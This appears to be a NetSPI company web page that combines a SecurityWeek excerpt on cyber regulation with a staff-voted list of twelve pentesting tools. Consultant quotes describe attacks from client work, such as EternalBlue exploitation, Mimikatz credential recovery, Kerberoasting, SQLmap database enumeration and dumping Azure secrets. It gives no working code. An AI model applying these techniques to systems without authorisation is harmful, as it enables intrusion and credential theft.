Penetration testing
Governance, risk, and compliance (GRC)
Incident response and investigations
Breach and attack simulations (BAS)
Certificate management
NetSPI is listed as a managed service offering, with an industry focus in financial services, high-tech, and media. Visit www.netspi.com to schedule a demo of NetSPI’s ASM platform.
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – penetration testing as a service, attack surface management, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers and e-commerce companies, and 50 percent of the Fortune® 50. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn.
On February 2, NetSPI Managing Director Ron Kurisack was featured in the SecurityWeek article called Cyber Insights 2023 | Regulations. Read the preview below or view it online.
+++
SecurityWeek Cyber Insights 2023 | Regulations – In this world, nothing is certain but death, taxes, and cyber regulations. The first is static, the second goes up and down, but the third seems only to increase. The three primary drivers for cyber regulations are voter privacy, the economy, and national security – with the complication that the first is often in conflict with the second and third.
Transatlantic data flows
Privacy is the headline battleground going forward, and amply illustrates the conflict between voter demands and national economies. This can be seen in the unsettled but multi-year attempt to find a legal solution to the transfer of personal user data from Europe to the US. Economics demands it, but European law (GDPR) and swathes of European public opinion deny it.
At the time of writing, it is almost certainly illegal to transfer PII from Europe to the US. The Privacy Shield – the second attempt at finding a workaround to GDPR – was declared illegal in what is known as the Schrems II court ruling. The wording of that ruling almost certainly eliminates an alternative approach known as ‘standard contractual clauses’.
During 2022, the European Commission (EC) and the US Biden administration have worked on developing a replacement for Privacy Shield. The ball was obviously in the US court, and on October 7, 2022, Biden issued an Executive Order to implement the EU-US Data Privacy Framework agreement – sometimes known as Privacy Shield 2.0.
This was enthusiastically greeted by US business. IBM, for example, issued a statement, “These steps will restore certainty to the thousands of companies already self-certified under Privacy Shield. Providing predictable, free flows of data between the US and the EU will secure the mutual benefits of continued business cooperation and will create a foundation for future economic growth.”
Finally
Martin Zinaich, CISO at the City of Tampa, once suggested to SecurityWeek, “If it ain’t required, it ain’t gonna happen.” We may have reached the point, with better organized cybercriminals and more aggressive nation states, where it must happen and therefore must be required.
Ron Kuriscak, MD at NetSPI, certainly believes so. “Regulations need to become much more mature, stringent, and punitive. We must hold organizations more accountable for their inaction in the area of cybersecurity… Organizations will be held accountable for basic cybersecurity hygiene. If they are unable to meet the most basic standards a regulator will require a third party to take over cybersecurity program execution (they will be mandated to cover the associated costs). Similar to the FDA, we will start seeing industry-aligned compliance regulations with real penalties that will force real compliance and organizational change. The key will be enforcement and penalties.”
Type “pentesting” into GitHub, and you’ll find nearly 9,000 repository results.
Finding the right penetration testing tools can be a daunting task, given the sheer number of both open source and commercial options available. Using the right tool for the right objective – from capturing and manipulating HTTP traffic to finding SQL injection during web application pentests – can make a significant impact during assessments.
To help narrow your search parameters, we surveyed our team of 200+ global pentesters to identify the 12 must-have pentesting tools of the moment. Drumroll please…
Recognized as the industry standard in web application penetration testing, Burp Suite is primarily used to capture and manipulate HTTP traffic.
It combines a top-class proxy, web vulnerability scanner, and an extensive ecosystem of extensions making it invaluable for performing penetration tests. BurpSuite provides a great level of control for users to uncover and exploit vulnerabilities while scanning for common web application flaws.
“I have used this tool nearly every day for over ten years. I have performed SQL Injections, server-side request forgeries, authentication/authorization bypasses, cross-site scripting, Java deserialization attacks, various code injections and remote code executions, and more.”
– Eric Gruber, Director, Attack Surface Management
“I use this tool for every pentest I do! For one test, I was able to intercept a file upload request and inject a malicious DTD to exploit server-side request forgery.”
– Karin Knapp, Security Consultant II
2. NMAP
NMAP (Network Mapper) is a popular pentesting tool used to assess networks for open ports and vulnerabilities. It has been around for many years, amassing a great deal of community support, excellent documentation, and expansive functionality. NetSPI’s global pentesting team uses it extensively in Attack Surface Management.
“We use it all the time in Attack Surface Management to identify open ports on our clients' attack surfaces. This is the first step in exploiting a large majority of vulnerabilities.”
Behind the scenes, Resolve is also a penetration testing workbench for our services team and select clients that purchase a subscription.
From a workbench perspective, it’s a one-stop shop for NetSPI pentesting assessments: it houses checklists, allows our consultants to communicate with clients, stores documents, and is a central platform to document findings.
Resolve’s checklists and finding templates help our pentesters be more consistent with their documentation and help in organizing a methodical and thorough testing process, a key reason why our consultants nominated it as a top tool.
The platform saves hours, even days, by taking the output from tools and sorting and correlating the findings. In addition, it can track findings and detections over time, which has enabled NetSPI to build out a large vulnerability repository with thousands of instructions for validating findings.
“Resolve takes care of 95% of the reporting process for me, so I can spend more time actually helping the client and doing my job.”
- Cameron Geehr, Managing Consultant
“…Compared to other companies I have worked at, Resolve at least halves the amount of time spent reporting, allowing for more time to be spent performing testing.”
CrackMapExec is a versatile pentesting tool used to perform various post-exploitation techniques from a single user-interface. NetSPI pentesters have used this tool to execute pass-the-hash attacks, credential dumping, password spraying, and more – often resulting in administrative compromise.
“It is actively developed and is a framework that allows execution of multiple techniques and interaction with multiple common services.”
While Browser Dev Tools are a built-in feature in all modern browsers intended to allow developers to debug their web applications, it can also be leveraged by penetration testers. Dev Tools’ availability in modern browsers like Safari, Chrome, and Firefox makes it one of the most foundational and accessible means of application security testing.
Dev Tools allow penetration testers to view and manipulate all client-side scripts, cookies, and other web elements. It can also come in handy when looking for hidden fields and other potentially sensitive data. It’s ability to inspect and manipulate the contents of a given web page within the context of a browser makes it a great resource for anything from debugging to viewing network traffic without an available intercepting proxy.
“Some applications insecurely configure user permissions on the client-side. In cases like this, an attacker can modify client-side code to elevate their permissions in the application.”
The Metasploit exploitation framework provides all the functionality a pentester might need, including scanning networks and targets, launching exploits, receiving shells, and even performing post-exploitation. With its open-source nature and constantly evolving feature set, Metasploit is a top penetration testing tool because it allows testers to leverage exploits to demonstrate the full impact of security vulnerabilities.
NetSPI Security Consultant James Maguire used Metasploit to compromise a windows domain and demonstrate the risks of missing security patches and password reuse to the client.
He shared, “Using Metasploit, I scanned the network for hosts missing the infamous MS17-010 (EternalBlue) patch.” He found three servers missing the patch, picked one, and launched the exploit using Metasploit. According to James, “The exploit was successful, and I got a Meterpreter shell. Meterpreter is a special attack payload available to Metasploit users and has several useful post-exploitation features and modules. I used one of my favorite modules (Mimikatz) to recover cleartext credentials from the victim server.” While reviewing the credentials, he discovered one of the accounts had domain admin privileges, and with that, he was able to deliver valuable penetration test results with ease.
“I was able to use Metasploit to compromise a windows domain and demonstrate the risks of missing security patches and password reuse to the client.”
SQLmap is an open-source project that tests for SQL injection vulnerabilities in web application requests. If found, it will also identify the type and location of the injection. It provides testers with an easy-to-use tool to interact with the vulnerability to enumerate data from the application's database.
SQLmap is a favorite among NetSPI’s consultants because SQL injection can be a very tedious finding to verify and determine its impact. SQLmap speeds up that process, thereby speeding up reporting.
NetSPI Security Consultant II Josiah Kohlmeyer explains, “When we find a SQL injection vulnerability, one of the ways to verify the finding is by enumerating the database version or database name. If the database name was ‘dev-database’, manually enumerating that requires us to hand-write SQL statements to brute-force determine each letter of the name one letter at a time.” When using SQLmap, pentesters can supply SQLmap the command "--current-db" and the tool will complete the enumeration and provide a database name in 30-60 seconds instead of the 15-30 minutes it would take to do manually.
“I've found SQL injection on several web application assessments, and I've always used SQLmap to verify the finding. Clients are always surprised to see I have information that should only be internally known.”
Known as the “C# toolset for raw Kerberos interaction and abuses,” Rubeus made the cut for its flexibility and power in Kerberos abuse.
Released in 2018, Rubeus allows for Kerberos interaction and abuse due to misconfigurations of Active Directory objects. It allows an attacker to request valid Ticket Granting Tickets (TGT) and Ticket Granting Services (TGS) for accounts configured with an SPN, and inject those Kerberos tickets into memory, processes, or to a file to authenticate on the domain.
NetSPI consultants have leveraged Rubeus to execute Kerberoasting, ASREProasting, pass-the-ticket, pass-the-hash, golden ticket, silver ticket, and diamond ticket attacks.
“Rubeus implements almost all of the known Kerberos attacks and is extremely flexible in how it works. There is no ONE thing out there that could replace Rubeus if it was somehow removed from history.”
- Derek Wilson, Senior Security Consultant
“After guessing a weak user account password, I used Rubeus to request all domain user account hashes with a Service Principal Name configured with RC4 encryption. I sent the hashes to a password cracker and cracked a domain admin password.”
Developed by NetSPI's very own VP of Research Karl Fosaaen, MicroBurst is a PowerShell toolkit that allows for various attacks on Azure Services.
It houses all the attack automation scripts useful in Azure Cloud Pentesting and includes functions for anonymous enumeration, authenticated attacks, auditing configurations, and performing post-exploitation actions.
The information gathering tools are especially useful, and the password dumping function "Get-AzPasswords" has proven to be a crucial component of many successful exploitation campaigns to dump Key Vaults, Automation Accounts, and other credentials to escalate privileges in an Azure subscription.
In this webinar, Karl leverages Get-AzPasswords to automate the collection of passwords stored in Azure. Additionally, MicroBurst can also be used for Azure subdomain enumeration as seen in this demo by Day Johnson.
Bonus Tools: Visit our repository of NetSPI-developed open source tools.